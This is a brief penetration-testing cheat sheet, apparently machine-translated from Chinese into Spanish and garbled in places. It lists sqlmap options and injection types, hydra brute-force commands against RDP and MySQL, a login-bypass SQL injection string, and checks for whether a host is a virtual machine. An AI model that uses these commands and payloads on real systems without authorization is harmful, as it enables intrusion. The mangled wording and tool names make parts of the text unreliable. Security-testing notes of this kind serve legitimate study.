Uno, sqlmap
-p especifica el punto de inyección
--La técnica especifica el tipo de inyección
B: ciego basado en booleano (inyección booleana)
E: basado en error (inyección basada en error)
U: basado en consulta de unión (inyección de consulta conjunta posible)
S: consultas apiladas (inyección de consulta de declaración múltiple posible)
T: ciego basado en tiempo (Basado en la inyección de retardo de tiempo)
P: consultas en línea (inyección de consultas anidadas)
--proxy = http: //127.0.0.1: 8080
--lote
El lema predeterminado de Port Bai de Oracle es 1521.
por ejemplo, py -2 sqlmap.py -r C: \ Users \ HP \ Desktop \ 1.txt --proxy = http: //127.0.0.1: 8080 -p zkzh --batch
-u "Es mejor agregar comillas dobles"
Dos, voladura 3389
hrdra 192.168.0.44 rdp -L user.txt -P pass.txt
hrdra 192.168.0.44 -l root -P pass.txt mysql -t 3 -v -f
-f blast la primera contraseña exitosa para detener
Tres, contraseña universal
Precedencia de ejecución del operador del lenguaje T-sql
'|| 1 ||'
Cuatro, determine si es una máquina virtual
ventanas: systeminfo
Máquina física:
系统制造商: To be filled by O.E.M.
系统型号: To be filled by O.E.M.máquina virtual:
系统制造商: VMware, Inc.
系统型号: VMware Virtual PlatformLinux: dmidecode -s system-product-name ===> Nota: se requiere permiso de root
Máquina física: RH2288H V3
Máquina virtual: plataforma virtual VMware
Cinco, determine si existe una CDN
